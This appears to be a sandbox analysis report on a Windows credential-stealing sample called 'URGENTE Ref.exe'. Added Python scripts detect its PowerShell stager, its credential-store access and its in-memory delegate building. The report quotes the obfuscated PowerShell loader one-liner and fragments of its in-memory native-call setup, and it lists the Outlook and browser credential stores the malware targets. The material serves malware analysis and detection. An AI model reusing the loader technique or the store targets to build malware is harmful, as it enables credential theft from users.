Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2380:120:WilError_03
Source: C:\Users\user\Desktop\URGENTE Ref.exe | File created: C:\Users\user\AppData\Local\Temp\nsdD029.tmp
Source: URGENTE Ref.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\URGENTE Ref.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Undismembered.exe, 0000000A.00000002.2495516741.00000000207E3000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.0000000020816000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.00000000207D3000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.00000000207F1000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.0000000020823000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: URGENTE Ref.exe | Virustotal: Detection: 33%
Source: URGENTE Ref.exe | ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\URGENTE Ref.exe | File read: C:\Users\user\Desktop\URGENTE Ref.exe
Source: unknown | Process created: C:\Users\user\Desktop\URGENTE Ref.exe "C:\Users\user\Desktop\URGENTE Ref.exe"
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Unsexual24=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Portentousness.Unm177';$Authorize=$Unsexual24.SubString(53440,3);.$Authorize($Unsexual24)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Undismembered.exe "C:\Users\user\AppData\Local\Temp\Undismembered.exe"
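The process chain listed above is the part of this report most worth turning into a detection: an installer on the Desktop starts powershell.exe with a minimized window and a one-liner that reads a whole file from %APPDATA%, slices three characters out of it at a fixed offset and invokes that slice as a command, after which powershell.exe drops and starts a second-stage EXE from %TEMP%. The script below is an added example, not Joe Sandbox output or code from the report. It reconstructs that chain from constructed process-creation records (the image paths and command lines are the ones listed above; the pids, the parent/child links and the benign last record are invented) and flags the PowerShell stager by its shape rather than by any of its randomised variable names. The three characters at offset 53440 are not shown in the report; treating a slice of at most four characters as an indicator is an assumption based on the usual size of an Invoke-Expression alias.

```python
import re

# Constructed process-creation records.  Image paths and command lines are the
# ones listed in the report; pids/ppids and the benign last record are invented.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Users\user\Desktop\URGENTE Ref.exe",
     "cmdline": r'"C:\Users\user\Desktop\URGENTE Ref.exe"'},
    {"pid": 200, "ppid": 100,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r'"powershell.exe" -windowstyle minimized "$Unsexual24=gc -Raw '
                 r"'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Portentousness.Unm177';"
                 r'$Authorize=$Unsexual24.SubString(53440,3);.$Authorize($Unsexual24)"')},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 300, "ppid": 200, "image": r"C:\Users\user\AppData\Local\Temp\Undismembered.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\Undismembered.exe"'},
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"powershell.exe" -NoProfile -Command Get-Service'},   # benign, for contrast
]

# Stager shape: read a whole file, slice a short substring out of it, then
# dot-source or call that substring as a command, all with a hidden window.
READ_RAW   = re.compile(r"\b(?:gc|cat|type|Get-Content)\b[^;]*?-Raw\b", re.I)
SUBSTRING  = re.compile(r"\.SubString\(\s*(\d+)\s*,\s*(\d+)\s*\)", re.I)
INVOKE_VAR = re.compile(r"[.&]\s*\$\w+\s*\(\s*\$\w+\s*\)")
HIDDEN     = re.compile(r"-w(?:indowstyle)?\s+(?:hidden|minimized)\b", re.I)
TEMP_EXE   = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.exe$", re.I)
CORE = {"reads_whole_file", "short_substring_slice", "invokes_variable_as_command"}

def slice_params(cmdline):
    """(offset, length) of a .SubString(offset, length) call, or None."""
    m = SUBSTRING.search(cmdline)
    return (int(m.group(1)), int(m.group(2))) if m else None

def stager_indicators(cmdline):
    hits = []
    if READ_RAW.search(cmdline):
        hits.append("reads_whole_file")
    sl = slice_params(cmdline)
    if sl and sl[1] <= 4:   # assumption: a 3-4 char slice is the size of an Invoke-Expression alias
        hits.append("short_substring_slice")
    if INVOKE_VAR.search(cmdline):
        hits.append("invokes_variable_as_command")
    if HIDDEN.search(cmdline):
        hits.append("hidden_window")
    return hits

def is_powershell(image):
    return image.rsplit("\\", 1)[-1].lower() in ("powershell.exe", "pwsh.exe")

def find_chains(events):
    """One finding per PowerShell process whose command line has the stager
    shape, with its parent image and any EXE it started from %TEMP%."""
    by_pid = {e["pid"]: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)
    findings = []
    for ps in events:
        if not is_powershell(ps["image"]):
            continue
        ind = stager_indicators(ps["cmdline"])
        if not CORE.issubset(ind):      # all three core indicators must be present
            continue
        parent = by_pid.get(ps["ppid"])
        findings.append({
            "powershell_pid": ps["pid"],
            "parent": parent["image"] if parent else None,
            "indicators": ind,
            "slice": slice_params(ps["cmdline"]),
            "spawned_from_temp": [c["image"] for c in children.get(ps["pid"], [])
                                  if TEMP_EXE.search(c["image"])],
        })
    return findings

if __name__ == "__main__":
    for finding in find_chains(EVENTS):
        print(finding)
```

The three core indicators are required together; the hidden window alone is too common in legitimate scheduled tasks to alert on. In a real pipeline the records would come from Sysmon event 1 or Windows event 4688 with command-line logging enabled, and the parent and %TEMP% child would be the pivot points for the investigation.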
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: wintypes.dll (3 occurrences)
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll (2 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: ucrtbase_clr0400.dll (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\URGENTE Ref.exe | File written: C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Eukalyptusen231\Dareful.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: URGENTE Ref.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
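Two rows in this section are the credential-theft evidence behind the "steal Mail credentials" and "harvest browser information" signatures: the second stage opens the Outlook profile account subkey (the 9375CFF0413111d3B88A00104B2A6676 key under HKCU\...\Outlook\Profiles) and carries the schema of Chromium's Login Data SQLite database in memory. A useful host-side check is to alert when a process that is not the owning application touches such a store. The script below is an added example, not part of the report or of Joe Sandbox; the event records are constructed (the Outlook key is the one quoted above; the Chromium and Firefox paths are the typical store locations and the Undismembered.exe read of Login Data is assumed, since the report only shows the table schema in its memory). The event shape, a process image plus a registry or file target, is modelled on Sysmon registry and file events and is an assumption.

```python
import re
from collections import defaultdict

# Credential stores and the processes that legitimately open them.  The
# Outlook pattern generalises the key quoted in the report (Office version and
# profile name vary); the browser paths are the usual store locations and are
# this example's own assumption.
CRED_STORES = [
    ("outlook_profile",
     re.compile(r"^HK(?:CU|EY_CURRENT_USER)\\Software\\Microsoft\\Office\\\d+\.\d+\\Outlook\\Profiles\\[^\\]+\\9375CFF0413111d3B88A00104B2A6676", re.I),
     {"outlook.exe"}),
    ("outlook_profile_legacy",   # older Outlook versions keep the same subkey here
     re.compile(r"\\Windows Messaging Subsystem\\Profiles\\[^\\]+\\9375CFF0413111d3B88A00104B2A6676", re.I),
     {"outlook.exe"}),
    ("chromium_logins",
     re.compile(r"\\User Data\\(?:Default|Profile \d+)\\Login Data$", re.I),
     {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe"}),
    ("firefox_logins",
     re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(?:logins\.json|key4\.db)$", re.I),
     {"firefox.exe"}),
]

# Constructed events: the first two mirror the report's second stage, the next
# two are the owning applications doing the same thing, the last is an
# unrelated read by the same malware process that must not fire.
EVENTS = [
    {"op": "reg_open", "image": r"C:\Users\user\AppData\Local\Temp\Undismembered.exe",
     "target": r"HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    {"op": "file_read", "image": r"C:\Users\user\AppData\Local\Temp\Undismembered.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"op": "reg_open", "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "target": r"HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    {"op": "file_read", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"op": "file_read", "image": r"C:\Users\user\AppData\Local\Temp\Undismembered.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\nskD2BC.tmp\nsExec.dll"},
]

def classify(event):
    """Return the credential-store label an event touches, or None."""
    for label, pattern, _ in CRED_STORES:
        if pattern.search(event["target"]):
            return label
    return None

def audit(events):
    """One finding per process that touched a store it is not allowed to open,
    listing the stores and flagging processes that went after more than one
    (a single stealer usually sweeps mail and browser stores in one run)."""
    hits = defaultdict(set)
    for ev in events:
        label = classify(ev)
        if label is None:
            continue
        allowed = next(a for l, _, a in CRED_STORES if l == label)
        image_name = ev["image"].rsplit("\\", 1)[-1].lower()
        if image_name not in allowed:
            hits[ev["image"]].add(label)
    return [{"image": img, "stores": sorted(s), "multi_store": len(s) > 1}
            for img, s in sorted(hits.items())]

if __name__ == "__main__":
    for finding in audit(EVENTS):
        print(finding)
```

The allowlist is keyed on the image file name only; in production it should also check the signer or full path, since a stealer that copies itself to chrome.exe in %TEMP% would otherwise pass.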

          Data Obfuscation

Source: Yara match | File source: 00000002.00000002.1618451140.000000000B086000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Ndlandings $Hustruer $Fragtvognes), (pachyhymenic @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Fgtemesteren = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bortrationaliserings)), $Prefeudalism).DefineDynamicModule($Albaner, $false).DefineType($Unneutralized, $Venstrehaandsarbejde, [System
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04D6C7CD push edi; ret 2_2_04D6C7D2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04D6C768 push ebp; ret 2_2_04D6C792
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04D6C3D0 push ebp; ret 2_2_04D6C792
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04D6C8ED pushad ; ret 2_2_04D6C8F2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04D6EB08 push eax; mov dword ptr [esp], edx 2_2_04D6EB0C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04D6B9C8 push ds; ret 2_2_04D6B9D2
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_3_0019CA98 pushfd ; retf 0019h 10_3_0019CA99
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_3_0019EE18 push eax; iretd 10_3_0019EE65
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_3_0019EE8C push eax; iretd 10_3_0019EEA9
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_3_0019CF4C push eax; iretd 10_3_0019CF4D
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_00159C30 push esp; retf 0017h 10_2_00159D55
Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_2361A227 pushfd ; ret 10_2_2361A231
Source: C:\Users\user\Desktop\URGENTE Ref.exe | File created: C:\Users\user\AppData\Local\Temp\nskD2BC.tmp\nsExec.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Undismembered.exe
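The two AMSI fragments in this section show the PowerShell stage building a delegate type at runtime (DefineDynamicAssembly / DefineDynamicModule / DefineType) and binding it to a raw function pointer with GetDelegateForFunctionPointer, which lets the script call native code without Add-Type and without an assembly on disk. The API name never appears in the script, since the pointer is resolved through the obfuscated call (Ndlandings $Hustruer $Fragtvognes), but the delegate's parameter and return types are still visible: four parameters (IntPtr, UInt32, UInt32, UInt32) returning IntPtr is, in a 32-bit host such as the SysWOW64 powershell.exe used here, the exact shape of VirtualAlloc. The script below is an added example, not part of the report or of Joe Sandbox: it extracts that type shape from script-block text and maps it to candidate Win32 prototypes. The sample text is the two fragments quoted above (the second truncated exactly as in the report); the prototype table and the VirtualAlloc inference are the example's own assumptions, since the report does not resolve the API.

```python
import re

# The two script fragments quoted in the report's AMSI rows (the second one is
# truncated there and kept as-is).  Constructed sample input for this example.
SAMPLE = r"""GetDelegateForFunctionPointer((Ndlandings $Hustruer $Fragtvognes), (pachyhymenic @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Fgtemesteren = [AppDomain]::CurrentDomain.GetAssemblies()
DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bortrationaliserings)), $Prefeudalism).DefineDynamicModule($Albaner, $false).DefineType($Unneutralized, $Venstrehaandsarbejde, [System"""

# Win32 prototypes as a 32-bit (SysWOW64) PowerShell host sees them: SIZE_T
# and DWORD become UInt32, handles and pointers IntPtr.  This table is the
# example's assumption; the report does not name the API behind the pointer.
API_SHAPES = {
    ("IntPtr", ("IntPtr", "UInt32", "UInt32", "UInt32")):                        ["VirtualAlloc"],
    ("IntPtr", ("IntPtr", "IntPtr", "UInt32", "UInt32", "UInt32")):              ["VirtualAllocEx"],
    ("IntPtr", ("IntPtr", "UInt32", "IntPtr", "IntPtr", "UInt32", "IntPtr")):    ["CreateThread"],
    ("UInt32", ("IntPtr", "UInt32")):                                            ["WaitForSingleObject"],
    ("IntPtr", ("String",)):                                                      ["LoadLibrary", "GetModuleHandle"],
    ("IntPtr", ("IntPtr", "String")):                                             ["GetProcAddress"],
}

# Building blocks of the "define a delegate type in memory, bind it to a raw
# function pointer" pattern.  Seeing three or more together is the signal.
MARKERS = ("DefineDynamicAssembly", "DefineDynamicModule", "DefineType",
           "GetDelegateForFunctionPointer")

# GetDelegateForFunctionPointer((<pointer expr>), (<type builder> @([T1], [T2], ...) ([TRet])))
DELEGATE = re.compile(
    r"GetDelegateForFunctionPointer\(\s*\((?P<ptr>[^)]*)\)\s*,\s*\(\s*(?P<builder>\w+)"
    r"\s+@\((?P<params>[^)]*)\)\s*\(\[(?P<ret>\w+)\]\)\s*\)")

def delegate_shapes(text):
    """Every delegate binding in the text, with its (return, params) shape
    and the Win32 prototypes that shape matches."""
    out = []
    for m in DELEGATE.finditer(text):
        params = tuple(re.findall(r"\[(\w+)\]", m.group("params")))
        shape = (m.group("ret"), params)
        out.append({"ptr_expr": m.group("ptr").strip(),
                    "builder": m.group("builder"),
                    "shape": shape,
                    "candidates": API_SHAPES.get(shape, [])})
    return out

def analyze(text):
    markers = [t for t in MARKERS if t in text]
    delegates = delegate_shapes(text)
    suspicious = len(markers) >= 3 and any(d["candidates"] for d in delegates)
    return {"markers": markers, "delegates": delegates, "suspicious": suspicious}

if __name__ == "__main__":
    result = analyze(SAMPLE)
    for d in result["delegates"]:
        print(d["shape"], "->", d["candidates"])
    print("markers:", result["markers"], "suspicious:", result["suspicious"])
```

Matching on type shape is robust against the renamed variables this loader uses, but it is an inference: several less common APIs share a shape, so the candidate list is a lead for the analyst, not proof. The input would normally be the ScriptBlockText of PowerShell event 4104 or the AMSI buffer itself.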

          Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 occurrences)
Source: C:\Users\user\Desktop\URGENTE Ref.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (55 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
